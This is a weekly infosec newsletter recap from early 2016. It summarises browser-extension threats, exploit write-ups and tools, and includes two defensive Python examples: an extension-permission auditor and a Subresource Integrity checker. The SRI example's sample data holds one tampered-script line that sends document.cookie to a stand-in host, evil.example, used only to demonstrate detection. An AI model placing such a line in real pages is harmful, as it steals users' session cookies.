
Downclimb: Summit Route's Weekly Infosec News Recap
2016.01.17 – 2016.01.24:
To receive a weekly email notification of this newsletter, email


"Hotlinking to randomly hosted js libraries is the new hotlinking to images. Except instead of goatse, your users get owned instead" @liamosaur


"Attempt: prevent malware.
Accomplish: become malware.
I don't know. Do we give AV vendors partial credit or not?" @tedunangst


"Attackers win when they know target's network better than target. Hunters win when they know attacker's tactics/tools better than attackers" @armitagehacker


"Now we have a new generation of researchers who've never done anything in cyberspace besides read email" Richard Bejtlich


"I just want someone to look at me the same way a Go developer looks at their own API structure." I Am Devloper

Top stories

Browser extension dangers

In The Web Is Dangerous: Phishing and Browser Extensions, the author highlights the dangers of browser extensions. Specifically, they have access to the content of, and the input you type into, every site you visit, and there is a market for people to buy popular browser extensions and turn them into adware. This happened in the past with Hover Zoom, for example, which has millions of users, but it has happened with many others as well. Although those instances were only used for ads and tracking, these extensions could easily be subverted to steal account credentials.

Browser extensions can usually be installed by unwitting users despite controls like application white-listing, and no existing EDR solution gives insight into the browser extensions being installed by your employees. This week saw a number of new threats in the browser extension ecosystem, such as a set of Chrome extensions that stole Counter-Strike inventory (link), and a Firefox extension installed by malware for man-in-the-browser attacks that steal money when users log into online banks (link).
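Since no EDR product inventories the extensions on employee machines, a defender can at least read the manifests directly. The following is an added example, not code from Downclimb or from the blog post it summarises: it walks a Chrome-style `Extensions/<id>/<version>/manifest.json` layout (the layout, the permission lists treated as risky, and the three sample manifests it writes into a temporary directory are assumptions constructed for this example) and flags extensions that can run on or reach every site or that hold permissions such as `webRequest` and `cookies`.

```python
"""Inventory browser extensions from their manifest.json files and flag the
ones whose permissions let them read or alter every page the user visits.

Added example, not code from Downclimb or from the blog post it summarises.
Chrome-style layout assumed: <profile>/Extensions/<id>/<version>/manifest.json.
The three manifests below are constructed sample data, not real extensions."""
import json
import tempfile
from pathlib import Path

# Match patterns that give an extension reach into every site.  The lists are
# assumptions for this example, not an official classification.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "cookies",
                     "tabs", "clipboardRead", "history", "debugger"}

# Constructed sample manifests: a narrowly scoped dictionary, an ad-injecting
# "zoom" extension with a content script on every page, and one that can
# intercept all requests and read cookies.
SAMPLE_MANIFESTS = {
    "aaaa/1.0": {"name": "Dictionary Lookup", "version": "1.0",
                 "permissions": ["storage"],
                 "host_permissions": ["https://dictionary.example/*"]},
    "bbbb/3.2": {"name": "Zoom Everything", "version": "3.2",
                 "permissions": ["tabs", "storage"],
                 "content_scripts": [{"matches": ["<all_urls>"], "js": ["z.js"]}]},
    "cccc/0.9": {"name": "Bank Helper", "version": "0.9",
                 "permissions": ["webRequest", "webRequestBlocking", "cookies",
                                 "*://*/*"]},
}


def write_sample_profile(root: Path) -> Path:
    """Lay out the constructed manifests like a Chrome profile's Extensions dir."""
    ext_dir = root / "Extensions"
    for rel, manifest in SAMPLE_MANIFESTS.items():
        d = ext_dir / rel
        d.mkdir(parents=True, exist_ok=True)
        (d / "manifest.json").write_text(json.dumps(manifest))
    return ext_dir


def host_patterns(manifest: dict) -> set:
    """Collect every match pattern the extension can run on or fetch from.
    Manifest V2 mixes host patterns into 'permissions', V3 uses
    'host_permissions', and content scripts declare their own 'matches'."""
    patterns = set()
    for key in ("permissions", "host_permissions"):
        patterns.update(p for p in manifest.get(key, [])
                        if "://" in p or p == "<all_urls>")
    for cs in manifest.get("content_scripts", []):
        patterns.update(cs.get("matches", []))
    return patterns


def assess(manifest: dict) -> dict:
    """Return the inventory record for one extension with its risk findings."""
    perms = set(manifest.get("permissions", []))
    findings = []
    if host_patterns(manifest) & BROAD_HOSTS:
        findings.append("runs on or can reach every site")
    for p in sorted(perms & RISKY_PERMISSIONS):
        findings.append(f"permission {p}")
    return {"name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "findings": findings}


def inventory(ext_dir: Path) -> list:
    """Walk an Extensions directory and assess every manifest.json found."""
    records = []
    for manifest_path in sorted(ext_dir.glob("*/*/manifest.json")):
        with open(manifest_path, encoding="utf-8") as f:
            manifest = json.load(f)
        rec = assess(manifest)
        rec["id"] = manifest_path.parent.parent.name
        records.append(rec)
    return records


def flagged(records: list) -> list:
    """Names of the extensions that have at least one finding."""
    return [r["name"] for r in records if r["findings"]]


def run_demo() -> list:
    """Build the sample profile in a temp dir, inventory it, print a report."""
    with tempfile.TemporaryDirectory() as tmp:
        records = inventory(write_sample_profile(Path(tmp)))
    for r in records:
        status = "; ".join(r["findings"]) or "no broad access"
        print(f"{r['id']} {r['name']} {r['version']}: {status}")
    return records


if __name__ == "__main__":
    run_demo()
```

Pointed at a real profile directory instead of the temporary one, `inventory()` gives a per-host list that can be diffed week over week; an extension whose findings change between versions is exactly the "sold and turned into adware" case the article describes.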

Reversing Apple’s syslogd bug

In-depth post showing how to diff Apple's OSX patches. Lots of great concepts and lessons covered. Link.


Conference materials and publications

  • BSides NYC slides: Conference in New York City last week.
  • Static Program Analysis: Course materials from this graduate course at Aarhus University in Denmark are available for those that want to learn about writing automated source code analyzers.

Tools

  • AWS Certificate Manager: Amazon AWS is finally providing an easy way to obtain and use SSL certs. They are also free!
  • MacDBG: Mac Debugger was created because OSX uses a debugger called lldb that has different commands than gdb.
  • Cuckoo Sandbox 2.0: This massive upgrade of the malware detonation environment now includes Windows 64-bit, OSX, Linux, and Android support. Additionally, network signatures can be used and HTTPS interception and decryption is now performed. This release is mostly a combination of the many forks that have occurred to the project over the years.
  • qiew: Long ago there was a program created called hiew, short for Hacker's View, which was a hex editor and disassembler. If you ever see a screenshot of hex on a dark blue background that looks like some sort of DOS prompt, that's hiew. Qiew is an open-source clone.

Other reads

  • Fortinet backdoor actually in current models: Following on the disclosure of backdoors in Fortinet devices last week, which were believed to have been patched out of more recent products, Fortinet has announced that this backdoor exists in current products as well, but maintains its view that this is not a malicious backdoor, since Fortinet inserted the easily exploitable backdoor itself, unlike the Juniper backdoors, which unknown attackers had inserted.
  • Ukraine cyberattack malware analysis: This report from the Chinese company Knownsec dissects the malware in the recent cyberattack against the Ukraine power grid. Of interest is that the malware tries to wipe or delete all files from the hard drives.
  • On SMS logins: an example from Telegram in Iran: This article highlights a couple of concepts. One is that using SMS for logins is a horrible idea, because anyone with an IMSI catcher can access those accounts. The other is, as the authors put it, "Unlike surveillance, censorship can be observed." The article notes that a number of political accounts in Iran were shut down by their owners, which is to say the accounts were likely hacked by the government and shut down that way. 20% of Telegram's userbase is in Iran, and a strong case is made that the reason for its use there is that Iran is able to intercept and control the service. It's been said many times, but if you have any concerns over security and privacy, stop using Telegram and use Signal instead. If you're in a hostile environment and find that one form of communication works better than the others, it's possible that you're being herded towards the option your attacker controls.
  • Autopwn every Android device on your network using BetterCap and the "addJavascriptInterface" vulnerability: The title is misleading, as this will only work against older Androids from before 4.2, which was released in 2012. But it shows the dangers of MiTM against communications without crypto. This post shows how to use an old addJavascriptInterface vulnerability (CVE-2012-6636), written about here in 2013. If you have MiTM capabilities against older Androids, and those devices run apps that download JavaScript libraries over HTTP, you can get shell access.
  • Analysis and Exploitation of a Linux Kernel Vulnerability (CVE-2016-0728): This write-up discusses a local privilege escalation vuln involving looping 2^32 times in order to overflow an int.
  • The Great Graph: I wrote about the problems of trust exploitation, especially with regard to attackers increasingly using connections between companies to jump from one to the other.
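Both the hotlinked-library quote at the top of this issue and the Android item above come down to the same failure: a client executes script bytes it fetched from somewhere it does not control, with no check that they are the bytes the page author intended. For browsers the standard mitigation is Subresource Integrity, where the page carries a hash of the expected file and the browser refuses a mismatch. The following is an added example, not code from Downclimb or from any of the linked posts; it implements the W3C SRI hash format (`<algorithm>-<base64 digest>`) on two constructed script samples, an original and a copy with an exfiltration line appended, and shows the verifier rejecting the altered copy. For apps fetching libraries over plain HTTP, as in the Android item, the same hash check applies, but the first fix is TLS.

```python
"""Compute and verify Subresource Integrity (SRI) values for a script a page
loads from a third-party host.

Added example, not code from Downclimb or from any post it links.  It follows
the W3C SRI format 'sha384-<base64 digest>' as browsers implement it; the
script bytes below are constructed sample data."""
import base64
import hashlib

# Constructed sample: the library as originally published, and a copy that a
# hijacked CDN or on-path attacker has appended a line to.
ORIGINAL_JS = b"function greet(n){return 'hi '+n;}\n"
TAMPERED_JS = ORIGINAL_JS + b"new Image().src='//evil.example/?c='+document.cookie;\n"

# Algorithms SRI allows, weakest to strongest.
SUPPORTED = ("sha256", "sha384", "sha512")


def make_integrity(content: bytes, algo: str = "sha384") -> str:
    """Return the value for the <script integrity=...> attribute."""
    if algo not in SUPPORTED:
        raise ValueError(f"unsupported algorithm {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify(content: bytes, integrity: str) -> bool:
    """Mimic the browser check: the attribute may list several hashes; only
    those for the strongest listed algorithm count, and the bytes are
    accepted if they match any one of them."""
    parsed = {}
    for token in integrity.split():
        algo, sep, b64 = token.partition("-")
        if sep and algo in SUPPORTED:
            parsed.setdefault(algo, set()).add(b64)
    if not parsed:
        return False  # no usable hash: nothing to check against
    strongest = max(parsed, key=SUPPORTED.index)
    actual = base64.b64encode(hashlib.new(strongest, content).digest()).decode("ascii")
    return actual in parsed[strongest]


def script_tag(src: str, content: bytes) -> str:
    """Render the tag an operator pastes into the page; crossorigin is
    required for the browser to apply the check to a cross-origin script."""
    return (f'<script src="{src}" integrity="{make_integrity(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    expected = make_integrity(ORIGINAL_JS)
    print(script_tag("https://cdn.example/lib.js", ORIGINAL_JS))
    print("original verifies:", verify(ORIGINAL_JS, expected))
    print("tampered verifies:", verify(TAMPERED_JS, expected))
```

Generating the `integrity` value is only useful if the page pins a specific library version: a CDN URL that serves "latest" will legitimately change and then fail the check, which is why SRI and version pinning go together.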